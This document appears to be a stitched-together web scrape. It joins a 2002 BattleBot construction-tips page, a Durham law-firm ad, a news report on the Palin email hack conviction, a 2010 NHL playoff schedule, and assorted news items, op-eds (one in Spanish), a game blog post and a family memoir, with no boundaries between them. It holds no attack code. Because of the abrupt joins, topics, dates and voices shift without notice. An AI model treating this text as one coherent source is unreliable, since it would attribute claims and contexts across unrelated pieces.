Long rotating cylinder drums can be used much like a disc , but they build up momentum using a larger mass with a much shorter radius .
This can be more durable but I have n't seen one with the same knockout power as a well - designed disc .
Spikes are also common .
Fixed position spikes make a great and very simple secondary weapon , allowing you to at least do something if your primary weapon breaks , but they rarely penetrate a well - armored bot .
If they are too long they can become awkward as well .
For a spike to do real damage , it needs to be able to retract and eject with a great deal of speed .
This is usually accomplished with pneumatics .
From what I 've seen , they often fail to work properly and if used frequently , the expanding air cools the cylinder so much that later strikes have less force .
( The volume of an ideal gas is directly proportional to temperature . )
An ejection mechanism can also be achieved using a winch and some large springs to store the energy .
I feel a design of this type has a lot of potential and we plan to build such a weapon for a future BattleBot that we will name Bond .
Logan was actually going to get a spring loaded spike with 2,600 pounds of ejecting force , but it just got too expensive for a first - time construction attempt .
Flipping arms have increased in popularity .
Some bots can be incapacitated when flipped upside down .
But because no one wants to lose like that , many builders are using invertible designs such as Logan's .
This renders an attack of this sort almost useless , except for the shock impact .
Pneumatics or linear actuators are usually used to power flipping devices .
Swinging overhead pickaxes and hammers are found on many bots .
They can strike on the top of a robot , where the armor is often lighter .
It can be hard to hit a moving opponent with such a weapon though .
They usually require many hits to be effective as well .
Large blades have also been used , but I really never see them do much damage .
Pickaxes can also be placed on the side of a bot and spun into the opponent with great force .
The big problem with this is that the robot has no maneuverability when it's in this spinning offensive mode .
Clamp bots are very interesting .
They are complex to build , but allow a bot to grab onto and control the opponent and perhaps lift it off the ground as well .
Clamp bots can then better use arena hazards to their advantage .
I like this concept a lot , but getting hold of the opponent when they are moving around and attacking you is probably harder than it sounds .
I suppose the same sort of thing could be used for a crushing attack , but this would require a lot of power .
The final weapon type that I will discuss is the drill .
Drills can do quite a bit of damage but they probably take too long to be effective under most circumstances .
Perhaps a drill could be combined with a clamp bot to hold the opponent in place while the drill does its thing .
Then again , this is probably a little too complex to be practical .
Just a thought .
Pneumatics :
There is at least one other potential power source besides electric motors and internal combustion engines worth mentioning .
The use of pressurized air can provide a bot with fast and powerful weapons .
However , such systems can be very dangerous to work with if you are inexperienced .
I 've also seen some pneumatically powered weapons with reliability problems but it also works well for some bots .
You can often achieve the same type of movement using an electric linear actuator , but it will be slower .
For example , the lifting arm of Biohazard is powered by two powerful linear actuators .
I really do n't know much about this subject so I 'll leave it at that .
Perhaps in the future I 'll want to build a pneumatic weapon and I 'll learn more about the topic .
You can check out http://www.hydraulics.com if you 're interested .
Miscellaneous parts :
You 'll be surprised at the number of strange odds and ends you 'll need to find to construct your BattleBot , especially if you 're building a complex weapon .
The best way to find such parts is online .
I suggest trying Efunda , which has a huge engineering database of parts and suppliers .
Let 's say you are looking for a helical compression spring that is 10 inches long , 2 inches wide , and compresses to 6 inches .
Good luck finding this right ?
Actually , it is easy .
Just go to Efunda .
Click on " springs " under mechanical components .
Next click on helical compression springs .
An entry form will now appear that lets you fill in various parameters with maximum and minimum values .
Enter 2 for the max and min outer diameter , 10 for max and min free length , and 6 for max and min solid height .
Now click find at the bottom and presto… one exact match and five close matches are found .
The part numbers and names of the companies complete with online listings are made available .
Sometimes , even this huge database does n't have what you want .
You 'll then have to make it yourself or have someone else custom make the part for you .
This can be quite expensive , so try to keep the custom parts you need at a minimum .
Consider altering your design slightly to allow for the use of a stock part .
You can find companies that will make parts to your specifications online such as at ( Sorry - Site is no longer around ) .
This same company also builds titanium bike frames .
These are light weight and strong and could be easily modified for use on a combat robot .
Their bike page can be found at http://www.spicercycles.com.
Getting funding :
Getting sponsors can be hard to say the least .
You 'll probably have to ask a hundred companies to get a single response .
You can improve your chances if you have something to show them besides a drawing .
Try to get your robot construction started before you contact them .
This way they know you are serious .
A web page could n't hurt either .
Be sure to explain that sponsoring can be a great way to get inexpensive advertising .
Go to top of page Watch Battlebots and Other Robot Videos
Battle Robot Construction Tips
Copyright 2001 - 2012 LoganBot.com
Revised August 22 , 2002
Personal Injury Lawyer in Durham , NC
Providing Legal Assistance in Car Accidents , Traffic Law , and More .
A serious accident can change your life forever .
To help you have the best chance of recovering and being compensated for your injuries , you need a personal injury lawyer in Durham that you can trust .
But accidents are n’t the only area where our Durham law firm can help .
An arrest on a criminal charge can threaten your job , your reputation and your future .
If this kind of event happens to you , you need experienced and capable legal representation by an experienced Durham lawyer .
The Law Offices of Kenneth J. Steinberg provides strong advocacy for people coping with a crisis .
As a Durham car accident lawyer , we help car accident victims and motorcycle victims or truck crash victims obtain compensation and medical care .
Our firm defends the rights and freedom of people facing misdemeanor and felony charges .
We help family members obtain justice and answers in wrongful death and medical malpractice cases .
If you have been injured on the job , we can help you recover the valuable workers ' compensation benefits you ’re entitled to .
Contact us for your free initial consultation with a Durham personal injury attorney or workers ’ compensation lawyer who will be on your side .
We are tough , aggressive and dependable .
Contact us at 919.479.5575 to schedule a legal consultation and see how we can help you .
Serving Durham & the Triangle areas
A Tennessee jury on Friday convicted David Kernell of obstruction of justice and misdemeanor computer intrusion in connection with his hacking of Sarah Palin 's e-mail account in 2008 , according to local news reports .
The jury acquitted the 22 - year - old Kernell of wire fraud , and deadlocked on a fourth charge of identity theft following four days of deliberation .
Kernell famously hacked into Palin's Yahoo webmail account while Palin was the Republican vice presidential candidate .
He used publicly available information about Palin to reset her password to " popcorn , " then posted screenshots of some of her e-mail , and the new password , to the /b/ message board on 4 chan so others could enjoy it .
Prosecutors will now have to decide whether to retry Kernell on the identity - theft charge , based on the theory that the former University of Tennessee student stole Palin ’s identity by taking over her Yahoo account .
Palin applauded the verdict Friday in a Facebook post that compared Kernell to Richard Nixon 's plumbers .
" As Watergate taught us , we rightfully reject illegally breaking into candidates ' private communications for political intrigue in an attempt to derail an election , " wrote Palin , who testified against Kernell in court last week .
In opting for the misdemeanor version of the computer - intrusion charge , the jury rejected prosecutors ' arguments that Kernell broke into Palin 's account in furtherance of another criminal act or civil wrongdoing beyond accessing Palin 's e-mail .
That means Kernell might have walked away from the trial without a felony conviction , if he had n't deleted evidence from his hard drive .
That , the jury found , constituted felony obstruction of justice .
Kernell is free on bond .
A sentencing date has not been set .
Updated 18:30 with Palin's Facebook comments ,
Image : Facebook.com
See Also :
2010 EASTERN CONFERENCE QUARTERFINALS
SERIES A # 1 vs. # 8 Network Thursday , April 15 at Washington , 7:00 p.m. TSN , VERSUS Saturday , April 17 at Washington , 7:00 p.m. TSN , VERSUS Monday , April 19 at Montreal , 7:00 p.m. TSN Wednesday , April 21 at Montreal , 7:00 p.m. TSN * Friday , April 23 at Washington , 7:00 p.m. TSN , VERSUS * Monday , April 26 at Montreal , 7:00 p.m. TSN , VERSUS * Wednesday , April 28 at Washington , TBD TSN SERIES B # 2 vs. # 7 Network Wednesday , April 14 at New Jersey , 7:30 p.m. TSN Friday , April 16 at New Jersey , 7:30 p.m. TSN Sunday , April 18 at Philadelphia , 6:00 p.m. TSN Tuesday , April 20 at Philadelphia , 7:30 p.m. TSN2 * Thursday , April 22 at New Jersey , 7:00 p.m. TSN * Sunday , April 25 at Philadelphia , TBD TSN * Tuesday , April 27 at New Jersey , 7:30 p.m. TSN SERIES C # 3 vs. # 6 Network Thursday , April 15 at Buffalo , 7:00 p.m. CBC
Saturday , April 17 at Buffalo , 1:00 p.m. NBC , CBC Monday , April 19 at Boston , 7:00 p.m. VERSUS , CBC Wednesday , April 21 at Boston , 7:00 p.m. VERSUS , CBC * Friday , April 23 at Buffalo , 7:00 p.m. CBC * Monday , April 26 at Boston , 7:00 p.m. CBC * Wednesday , April 28 at Buffalo , 7:00 p.m. CBC SERIES D # 4 vs. # 5 Network Wednesday , April 14 at Pittsburgh , 7:00 p.m. CBC , VERSUS Friday , April 16 at Pittsburgh , 7:00 p.m. CBC , VERSUS Sunday , April 18 at Ottawa , 6:30 p.m. CBC , VERSUS Tuesday , April 20 at Ottawa , 7:00 p.m. CBC , VERSUS * Thursday , April 22 at Pittsburgh , 7:00 p.m. CBC , VERSUS * Saturday , April 24 at Ottawa , 7:00 p.m. CBC , VERSUS * Tuesday , April 27 at Pittsburgh , 7:00 p.m. CBC 2010 WESTERN CONFERENCE QUARTERFINALS SERIES E #1 vs. # 8 Network Wednesday , April 14 at San Jose , 10:30 p.m. CBC , VERSUS ( JIP ) Friday , April 16 at San Jose , 10:30 p.m. CBC , VERSUS ( JIP ) Sunday , April 18 at Colorado , 9:30 p.m. CBC , VERSUS ( JIP ) Tuesday , April 20 at Colorado , 10:00 p.m. CBC , VERSUS ( JIP ) * Thursday , April 22 at San Jose , 10:30 p.m. CBC , VERSUS ( JIP ) * Saturday , April 24 at Colorado , TBD CBC * Monday , April 26 at San Jose , TBD CBC SERIES F # 2 vs. # 7 Network Friday , April 16 at Chicago , 8:30 p.m. TSN2 , VERSUS ( JIP ) Sunday , April 18 at Chicago , 8:30 p.m. TSN , VERSUS ( JIP ) Tuesday , April 20 at Nashville , 9:00 p.m. TSN , VERSUS ( JIP ) Thursday , April 22 at Nashville , 8:30 p.m. TSN2 , VERSUS ( JIP ) * Saturday , April 24 at Chicago , 3:00 p.m. NBC , TSN * Monday , April 26 at Nashville , TBD TSN * Wednesday , April 28 at Chicago , TBD TSN
SERIES G # 3 vs. # 6 Network Thursday , April 15 at Vancouver , 10:00 p.m. CBC , VERSUS Saturday , April 17 at Vancouver , 10:00 p.m. CBC , VERSUS Monday , April 19 at Los Angeles , 10:00 p.m. CBC , VERSUS Wednesday , April 21 at Los Angeles , 10:00 p.m. CBC , VERSUS * Friday , April 23 at Vancouver , 10:00 p.m. CBC * Sunday , April 25 at Los Angeles , TBD CBC , VERSUS * Tuesday , April 27 at Vancouver , TBD CBC SERIES H # 4 vs. # 5 Network Wednesday , April 14 at Phoenix , 10:00 p.m. TSN , VERSUS Friday , April 16 at Phoenix , 10:00 p.m. TSN , VERSUS Sunday , April 18 at Detroit , 3:00 p.m. NBC , TSN Tuesday , April 20 at Detroit , 6:30 p.m. TSN * Friday , April 23 at Phoenix , 10:00 p.m. TSN , VERSUS * Sunday , April 25 at Detroit , 2:00 p.m. NBC , TSN * Tuesday , April 27 at Phoenix , TBD TSN
The matchups have been determined , and the combatants will ratchet up their quest for the Stanley Cup , with the NHL 's postseason beginning on Wednesday , April 14 , when four series get under way , including the defending champion Pittsburgh Penguins at home against the Ottawa Senators
Three more quarterfinal matchups begin on Thursday as the Washington Capitals , winners of the League 's Presidents '
Trophy for most points during the regular season , open against the Montreal Canadiens .
The final series begins Friday when the No. 2 seed in the Western Conference , the Chicago Blackhawks , host division rival Nashville .
Here is the full schedule for the 2010 Stanley Cup Playoffs Quarterfinals :- * denotes if necessary - All Times are Eastern Daylight Time - ( JIP ) Game joined in progress .
NOTE - all Joined in Progress games will be available in their entirty in NHL Center Ice / NHL GameCenter Live in the U.S .
The Canadian Press
April 28 , 2010
A d v e r t i s e m e n t
{openx:49}
TORONTO —
The decision to ban a controversial British MP from Canada was an “ exercise in taunting ” by senior government officials who disagreed with George Galloway ’s views on Afghanistan , lawyers argued during a judicial review Wednesday .
Lawyer Barbara Jackman said the Canadian government falsely and unfairly labelled Galloway a terrorist because it did n’t like his views .
All Galloway did was provide humanitarian aid to the people of Gaza , Jackman said , a move that some claimed meant he supported Hamas , which has been deemed a terrorist organization .
“ It ’s clear Canadian aid was going into Gaza , so it ’s all right for our government to do it but not for Mr. Galloway ? ” she asked .
“ If in fact Mr. Galloway is a terrorist because he provided humanitarian aid to the government of Gaza , then our prime minister is as well . ”
Read entire article
The Emergency Election Sale is now live !
Get 30 % to 60 % off our most popular products today !
Please turn on JavaScript .
Media requires JavaScript to play .
Advertisement
Stormont assembly members are voting to appoint a new justice minister .
The successful candidate will be the first Northern Ireland politician to take responsibility for justice and policing in 38 years .
The Ulster Unionists nominated Danny Kennedy but he failed to attract the necessary cross community support .
The SDLP's Alban Maginness also failed to get the necessary support so the Alliance leader David Ford is certain to take the job .
Mr Ford will be in charge of a department with more than 4,000 employees and a budget of almost £ 1.5 bn .
Collapse
He will be the first local justice minister since Westminster took policing powers away from the old Stormont government back in 1972 .
Disagreement on the timing of the devolution of the justice powers had threatened to collapse Northern Ireland 's power - sharing administration .
In February , Northern Ireland 's two main parties , the DUP and Sinn Fein , in discussions at Hillsborough , County Down , reached an agreement which will see a justice minister elected .
The Hillsborough Agreement allows for the first and deputy first ministers to identify a candidate who would command cross-community support in the assembly .
Stormont Live will be covering this story on BBC Two Northern Ireland from 1415 BST
Sunrise host David Koch asked the teenagers to leave following Bieber 's impromptu song .
Many of them had been waiting since 6 pm yesterday to see their young idol .
" You 've now have to go home in a quiet manner , " Koch told them .
Meant to perform at Circular Quay Bieber , 16 , was meant to sing three songs at the Forecourt in front of the Overseas Passenger Terminal on Seven 's Sunrise program , in what would have been his only Australian public performance .
But whispers that he had arrived early forced a crowd surge about 2 am .
Problems with the excited group continued over the following hours , with crowd surges crushing and trampling some fans and breaking barriers .
Channel Seven reported at least 10 girls fainted and were treated by paramedics .
With an estimated 4000 people waiting and many more expected to turn up , police decided to call off the free performance .
" We pulled out more than 100 teens suffering distress at the front of the stage , " a police spokesman said .
I would love you to stay and hang but you have got to go .
The police say you 've got to go home Parents angry at organisers
Angry parents blamed Channel Seven for the chaos , saying the event was poorly organised and dangerous .
One father who took his children to Martin Place said angrily : " Clearly this total waste of our kids ' time , sleep and pocket money getting there was a deliberate publicity stunt designed to exploit fans .
" Certainly [ Sunrise ] knew that thousands of kids would turn out , and it would be unmanageable , and set him up to play to a few kids at Martin Place .
" Channel Seven and Sunrise owe the fans and their parents an apology for shameless publicity stunts that ended in injury , hurt , disappointment , money spent and sleep deprived . "
Colleen McMenamin , who took her daughters to the concert , said crowd control was " non-existent " and Channel Seven " owes the public an explanation " .
" People were pouring into the forecourt yet it was at least and hour before any announcements were made , " she said .
" A notice was then put up on the stage screen saying that the police had called off the show .
" At this point there were a few police moving through the crowd saying that the show had been cancelled . "
Meanwhile , Channel Seven 's head of morning programming , Adam Boland , has blamed parents and poorly - behaved fans for the extraordinary crush .
" At one stage we asked any parents to come in and help ... and we had ( emcee ) Mike Goldman trying to get this crowd back into this space , but they just would n't move ... so the police inspector and myself decided to pull the plug , " Boland said .
Bieber tweets disappointment Bieber tweeted that he was " just as disappointed as everyone else " .
" I woke up this morning to the police cancelling the show for safety reasons .
" I love my fans ... I love it here in Australia ... and I want to sing . "
Koch said on Sunrise : " It was quite extraordinary scenes , quite dangerous scenes down there . "
Braeley Brotherstone , 10 , said she had travelled by train from Liverpool with her mother , Tracey , about 3 am today so that she could watch the concert at Circular Quay .
" I was at Circular Quay at 5 am but we were told the concert was cancelled so we came here , " said Braeley , holding a poster of Bieber photos and hearts outside the Channel Seven studios in Martin Place .
" I like Justin ' cause he ’s hot .
He 's got a fantastic body and a great voice . "
Safa Shalak , Samarah Bayrouti , Moana Morrs and Tania Chamaa , all 16 , said they were angry with the concert organisers for cancelling the concert as they had been camping out at Circular Quay since 5 pm yesterday .
'' We brought our PJs and blankets .
It was really cold .
" We waited there all night .
They promised us three songs but he only sang one [ at the studio ] , " Samarah said .
" Some of his fans came all the way from Perth and Adelaide ... I would n’t do it again .
We only got to see him through the window .
We could have seen more on television . "
Martin Place mosh pit
Martin
Place turned into a mosh pit this morning as thousands of fans rushed from Circular Quay to the Channel Seven studios , hoping to get a glimpse of the teen star .
Police officers lined the barricade in front of the glass windows of the studio as Bieber sang Baby and young girls yelled out his name and waved placards .
Even after he finished the song and left the studio , the fans remained outside , repeatedly pushing in crowds towards the studio glass windows in the hope he would make another appearance .
Eight children treated outside Channel Seven studios Inspector Millevoi , the NSW Ambulance commander outside the studio , said eight children were treated by paramedics .
Two children were brought to Sydney hospital .
One teen fractured her knees and another hit her head and " was knocked out for a while " , Inspector Millevoi said .
The other children were treated for hyperventilation , he said .
Deja vu
The sequence of events leading up to this morning 's cancellation in Sydney was remarkably similar to the events that unfolded in a mall in Long Island , New York , last November .
Bieber 's free concert was also cancelled at the 11th hour when hundreds of fans stampeded after a reported sighting of the teen star before the schedule start of the Friday afternoon performance .
Scott Braun , Bieber 's manager , was later charged with reckless endangerment and criminal nuisance .
Police alleged that Braun failed to properly control the situation at the mall .
According to reports , Braun had refused a police request to send a Twitter message to Bieber 's fans to notify his followers that the event was cancelled .
Braun was taken into custody last month and formally charged with the offence .
If found guilty , he could be sentenced to a year behind bars .
Loading Bieber became a worldwide sensation when he released his debut single One Time less than a year ago .
Glenda Kwek , Paul Tatnell and AAP
The final insult , he said , came when Michigan cut those payments by 8 percent last year to help close a gaping budget shortfall .
“ My office manager was telling me to do this for a long time , and I resisted , ” Dr. Sahouri said .
“ But after a while you realize that we ’re really losing money on seeing those patients , not even breaking even .
We were starting to lose more and more money , month after month . ”
It has not taken long for communities like Flint to feel the downstream effects of a nationwide torrent of state cuts to Medicaid , the government insurance program for the poor and disabled .
With states squeezing payments to providers even as the economy fuels explosive growth in enrollment , patients are finding it increasingly difficult to locate doctors and dentists who will accept their coverage .
Inevitably , many defer care or wind up in hospital emergency rooms , which are required to take anyone in an urgent condition .
Mrs. Vliet , 53 , who lives just outside Flint , has yet to find a replacement for Dr. Sahouri .
“ When you build a relationship , you want to stay with that doctor , ” she said recently , her face gaunt from disease , and her head wrapped in a floral bandanna .
“ You do n’t want to go from doctor to doctor to doctor and have strangers looking at you that do n’t have a clue who you are . ”
Image Rebecca and Jeoffrey Curtis searched for care for their son .
In the process , they felt like “ second - class citizens , ” Ms. Curtis said .
Credit ... Stephen McGee for The New York Times
The inadequacy of Medicaid payments is severe enough that it has become a rare point of agreement in the health care debate between President Obama and Congressional Republicans .
In a letter to Congress after their February health care meeting , Mr. Obama wrote that rates might need to rise if Democrats achieved their goal of extending Medicaid eligibility to 15 million uninsured Americans .
It frequently happens in science that what you throw away turns out to be most valuable .
It happened to Deepak Nagrath , but not for long .
The Rice assistant professor in chemical and biomolecular engineering was looking for ways to grow cells in a scaffold , and he discarded the sticky substance secreted by the cells .
" I thought it was contamination , so I threw the plates away , " said Nagrath , then a research associate at Harvard Medical School .
That substance , derived from adipose cells -- aka body fat -- turned out to be a natural extracellular matrix , the very thing he was looking for .
Nagrath , who joined Rice in 2009 , and his co-authors have since built a biological scaffold that allows cells to grow and mature .
He hopes the new material , when suffused with stem cells , will someday be injected into the human body , where it can repair tissues of many types without fear of rejection .
The research by Nagrath and his co-authors appeared last week in the Federation of American Societies for Experimental Biology ( FASEB ) Journal .
advertisement
The basic idea is simple : Prompt fat cells to secrete what bioengineers call " basement membrane . "
This membrane mimics the architecture tissues naturally use in cell growth , literally a framework to which cells attach while they form a network .
When the cells have matured into the desired tissue , they secrete another substance that breaks down and destroys the scaffold .
Structures that support the growth of living cells into tissues are highly valuable to pharmaceutical companies for testing drugs in vitro .
Companies commonly use Matrigel , a protein mixture secreted by mouse cancer cells , but for that reason it can't be injected into patients .
" Fat is one thing that is in excess in the body .
We can always lose it , " Nagrath said .
The substance derived from the secretions , called Adipogel , has proven effective for growing hepatocytes , the primary liver cells often used for pharmaceutical testing .
" My approach is to force the cells to secrete a natural matrix , " he said .
That matrix is a honey - like gel that retains the natural growth factors , cytokines ( substances that carry signals between cells ) and hormones in the original tissue .
Nagrath 's strategy for growing cells is n't the only approach being pursued , even at Rice : Another method reported last week in Nature Nanotechnology uses magnetic levitation to grow three - dimensional cell cultures .
But Nagrath is convinced his strategy is ultimately the most practical for rebuilding tissue in vivo , and not only because it may cost significantly less than Matrigel .
" The short - term goal is to use this as a feeder layer for human embryonic stem cells .
It 's very hard to maintain them in the pluripotent state , where they keep dividing and are self - renewing , " he said .
Once that goal is achieved , Adipogel may be just the ticket for transplanting cells to repair organs .
" You can use this matrix as an adipogenic scaffold for stem cells and transplant it into the body where an organ is damaged .
Then , we hope , these cells and the Adipogel can take over and improve their functionality . "
Nagrath 's co-authors are Nripen S. Sharma , a research associate at Rutgers University , and Martin Yarmush , the Helen Andrus Benedict Professor of Surgery and Bioengineering at Harvard Medical School .
The National Institutes of Health and the Shriners Hospitals for Children supported their research .
The AKC Rescue Network is the largest network of dog rescue groups in the country , and was officially recognized by the American Kennel Club in late 2013 .
One hundred sixty unique breeds are currently represented within the network .
More than 450 AKC Rescue Network groups are located across the United States .
AKC ’s “ National Breed Clubs ” spearhead the bulk of these rescue groups , and it ’s often breeders and fanciers that are at the heart of these rescues , rehabs and rehomes .
The AKC Rescue Network ’s groups are unique in that the fostering / rehabilitation period lasts as long as is necessary before the dog is rehomed .
Foster volunteers provide intimate , transparent knowledge about the dog ’s history , temperament , health concerns and special needs that allows them to place the dog in the best - fitting home .
According to a recent AKC Rescue Network survey , rescue volunteers said the top three reasons cited by owners for surrendering their dog are change of lifestyle , not the right breed for them , and lack of time to spend with the dog .
They also said that the biggest issues they face are the lack of foster homes , manpower , and funding .
** All breed rescue groups are listed to the left by breed .**
IE : A Breed Rescue
Only for Club / Rescue organization below
To join the AKC Rescue Network , please provide the following information in an e-mail to breedrescue@akc.org :
Liv Boeree , 25 , seems like your regular hot model but interestingly she is a lot of brains too .
She just won the European Poker Tour at San Remo , Italy while beating 1,240 players to win 1.25 million Euro .
She is the third woman to win the tournament .
She is currently studying astrophysics at Manchester University .
Liv , who is nicknamed Iron Maiden because of her love of heavy metal and playing the guitar , only began playing poker five years ago after taking part in a reality TV show on Channel Five .
Her previous biggest win was £ 30,000 two years ago when she won the European Ladies Tournament .
Source : www.dailymail.co.uk
Check her pictures –
Interestingly , she started playing poker just 5 years ago !
Since she is planning to buy a house in Las Vegas , my question is – “ are you single ? “
En octubre del año pasado , en este mismo espacio , publicamos una encuesta sobre el estado de ánimo de los mexicanos .
Dábamos cuenta entonces de que ocho de cada diez personas percibían hartazgo , impotencia e incertidumbre entre quienes los rodean , y reportamos que el 68 % consideraba que los continuos y graves problemas que estamos viviendo lejos de unirnos , están provocando divisiones y enfrentamientos entre nosotros .
Séneca decía que no hay viento favorable para el que no sabe a dónde va , y yo tengo la impresión de que mucho de ese sentimiento de hartazgo e incertidumbre se debe precisamente a que no tenemos la más triste idea de a dónde vamos como país y como sociedad .
Poniéndolo en términos de planeación estratégica empresarial , tengo la impresión de que México no tiene en este momento una misión definida , cuál es el propósito general o razón de ser que tenemos en el concurso de las naciones , ni tampoco hemos llegado a un acuerdo sobre nuestra visión , porque tampoco tenemos claro hacia dónde nos queremos dirigir en largo plazo , y por tanto qué deberíamos estar haciendo para conseguirlo .
Más información descargable México : Fortalezas y debilidades
Hoy pareciera que somos una sociedad consumida por la inmediatez , por los problemas del día a día , y así es difícil jerarquizar la importancia de los acontecimientos cotidianos que terminan por sumirnos en ese estado de ánimo de hartazgo , angustia e incertidumbre que reportábamos aquí hace apenas unos meses .
El ánimo no podría ser otro porque los problemas que estamos viviendo son muy serios , pero también abona al hartazgo escuchar una y otra vez hablar de lo que hemos dejado de hacer , lo que está mal , lo que no funciona , sin que intervenga nunca una frase propositiva de hacia dónde tenemos que remar y para qué .
En la encuesta que presentamos hoy en ELPAIS.com le preguntamos a los entrevistados su opinión sobre qué posición ocupa México respecto a otros países en nueve materias básicas : industria , turismo , agricultura y ganadería , desarrollo tecnológico , investigación científica , medicina , medio ambiente y ecología , deportes , arte y cultura .
Encontramos que cuatro de cada diez entrevistados ubicaron como fortalezas de México la medicina , el turismo , el arte y la cultura , pero aun en estas materias que son las que mejores promedios obtuvieron , la mayoría se inclinó por calificarlas por debajo de siete en una escala de diez puntos , superando apenas el 6.5 de calificación promedio .
En el extremo contrario , los promedios más bajos los obtuvieron las materias de investigación científica , la preservación del medio ambiente y lo que tiene que ver con el deporte , pero la distancia de los promedios alcanzados en estas materias no es mucha respecto a los que obtuvieron las mejor calificadas .
Los datos de la encuesta evidencian cómo los mexicanos como sociedad no tenemos claro cuáles son nuestras fortalezas y tampoco somos capaces de señalar contundentemente en dónde están nuestras debilidades .
Cada uno percibe desventajas y oportunidades desde su visión particular , sin que hayamos podido construir un esquema general que nos describa como país .
Si quienes hoy dirigen este barco llamado México entendieran la importancia de la afirmación de Séneca , dedicarían tiempo , dinero y esfuerzo en definir y difundir una propuesta coherente y creíble para nuestra misión como país , y a partir de ella se podría aspirar a construir una visión que como sociedad nos haga salir de este letargo en el que parece que estamos irremediablemente sumergidos .
No se trata simplemente de no hablar de los problemas que tenemos para no demeritar la imagen del país , como una y otra vez ha insistido el Presidente Felipe Calderón , porque ni el sol se tapa con un dedo , ni el silencio puede ser el remedio para el hartazgo .
Se trata de levantar la mira , de fijar rumbo .
Parafraseando el slogan de campaña de Felipe González , aquí nos está haciendo falta pensar México en positivo .
Splinter Cell's Departure From Stealth Is Due To Accessibility
by Brian Goodman [ Wednesday , 14th of April 2010 - 12:20 AM ]
Refresh my memory but when did exciting , intense stealth based action games start being marketed to the Guitar Hero crowd ?
I enjoy my casual titles as much as the next person , but it sets a very dangerous precedent when major developers and publishers begin changing proven , unique , and popular gameplay mechanics to try and take a " hardcore " property to a more " casual " , mainstream crowd .
I may not be a marketing genius , but if you have created an installed fan base of over a million worldwide should n't you not try and alienate them by undergoing what will most likely be interpreted as a dumbing down of a beloved franchise ?
Also when did releasing a " hardcore " game get to be a bad thing ?
Call of Duty : Modern Warfare 2 is about as hardcore as it gets and it seems to have done just fine .
It does not bode well for the " hardcore " crowd when major publishers are afraid to make games marketed towards them .
I live in fear of seeing a press release about " Half Life 3 : Plants vs. Headcrab Zombies . "
By Charles Krauthammer - February 5 , 2010
WASHINGTON -- " I am not an ideologue , " protested President Obama at a gathering with Republican House members last week .
Perhaps , but he does have a tenacious commitment to a set of political convictions .
Compare his 2010 State of the Union to his first address to Congress a year earlier .
The consistency is remarkable .
In 2009 , after passing a $ 787 billion ( now $ 862 billion ) stimulus package , the largest spending bill in galactic history , he unveiled a manifesto for fundamentally restructuring the commanding heights of American society -- health care , education and energy .
A year later , after stunning Democratic setbacks in Virginia , New Jersey and Massachusetts , Obama gave a stay - the - course State of the Union address ( a ) pledging not to walk away from health care reform , ( b ) seeking to turn college education increasingly into a federal entitlement , and ( c ) asking again for cap - and - trade energy legislation .
Plus , of course , another stimulus package , this time renamed a " jobs bill . "
This being a democracy , do n't the Democrats see that clinging to this agenda will march them over a cliff ?
Do n't they understand Massachusetts ?
Well , they understand it through a prism of two cherished axioms : ( 1 ) The people are stupid and ( 2 ) Republicans are bad .
Result ?
The dim , led by the malicious , vote incorrectly .
Liberal expressions of disdain for the intelligence and emotional maturity of the electorate have been , post - Massachusetts , remarkably unguarded .
New York Times columnist Charles Blow chided Obama for not understanding the necessity of speaking " in the plain words of plain folks , " because the people are " suspicious of complexity . "
Counseled Blow : " The next time he gives a speech , someone should tap him on the ankle and say , ' Mr. President , we 're down here . ' "
A Time magazine blogger was even more blunt about the ankle - dwelling mob , explaining that we are " a nation of dodos " that is " too dumb to thrive . "
Obama joined the parade in the State of the Union address when , with supercilious modesty , he chided himself " for not explaining it ( health care ) more clearly to the American people . "
The subject , he noted , was " complex . "
The subject , it might also be noted , was one to which the master of complexity had devoted 29 speeches .
Perhaps he did not speak slowly enough .
Then there are the emotional deficiencies of the masses .
Nearly every Democratic apologist lamented the people 's anger and anxiety , a free - floating agitation that prevented them from appreciating the beneficence of the social agenda the Democrats are so determined to foist upon them .
That brings us to Part 2 of the liberal conceit : Liberals act in the public interest , while conservatives think only of power , elections , self - aggrandizement and self - interest .
It is an old liberal theme that conservative ideas , being red in tooth and claw , cannot possibly emerge from any notion of the public good .
A 2002 New York Times obituary for philosopher Robert Nozick explained that the strongly libertarian implications of Nozick 's masterwork , " Anarchy , State , and Utopia , " " proved comforting to the right , which was grateful for what it embraced as philosophical justification . "
The right , you see , is grateful when a bright intellectual can graft some philosophical rationalization onto its thoroughly base and self - regarding politics .
This belief in the moral hollowness of conservatism animates the current liberal mantra that Republican opposition to Obama 's social democratic agenda -- which could n't get through even a Democratic Congress and powered major Democratic losses in New Jersey , Virginia and Massachusetts -- is nothing but blind and cynical obstructionism .
By contrast , Democratic opposition to George W. Bush -- from Iraq to Social Security reform -- constituted dissent .
And dissent , we were told at the time , including by candidate Obama , is " one of the truest expressions of patriotism . "
No more .
Today , dissent from the governing orthodoxy is nihilistic malice .
" They made a decision , " explained David Axelrod , " they were going to sit it out and hope that we failed , that the country failed " -- a perfect expression of liberals ' conviction that their aspirations are necessarily the country 's , that their idea of the public good is the public 's , that their failure is therefore the nation's .
Then comes Massachusetts , an election Obama himself helped nationalize , to shatter this most self - congratulatory of illusions .
For liberals , the observation that " the peasants are revolting " is a pun .
For conservatives , it is cause for uncharacteristic optimism .
No matter how far the ideological pendulum swings in the short term , in the end the bedrock common sense of the American people will prevail .
The ankle - dwelling populace pushes back .
It re-centers .
It renormalizes .
Even in Massachusetts .
DARPA has updated the Big Dog video to show the robot running a bit .
I remember making my father cry when I told him I thought we were rich because I had shoes .
( I am crying now )
My father , an American citizen born in San Antonio , had his family destroyed when in they did n't allow his father back from Mexico after a family visit .
A family of ten kids and their mother was sent into abject poverty in the depression when a successful house contractor was trapped in Mexico during the Mexican Reparation .
Then my grandmother died of a " broken heart " .
My great aunt took the kids over , her husband went to the gov. for some relief and was told that the kids should be placed in an orphanage .
http://en.wikipedia.org/...
And so my Dad was just a dirty Mexican that now would be called an anchor baby .
Though a second generation American daughter of a sailor who fought the Japanese in the Pacific , I too , was just a " dirty Mexican " and all of us were gerrymandered to the west side of San Antonio .
My mother , a great cook , would make beans and tortillas taste great .
We were poor , but the mojaditos era mas pobre .
It make me so angry when people hammer away at Mexican immigrants but enjoy their spinach and strawberry salads and wonder at the lovely landscaping .
" Ladies who lunch " can because Maria is caring for the children will feed them their lunch and will vacuum the carpet later .
We have been in the United States a very long time .
http://frontiers.loc.gov/...
http://frontiers.loc.gov/...
Under the treaty that ended the Mexican War , most of the Mexicans who lived in the new United States territories became U.S. citizens .
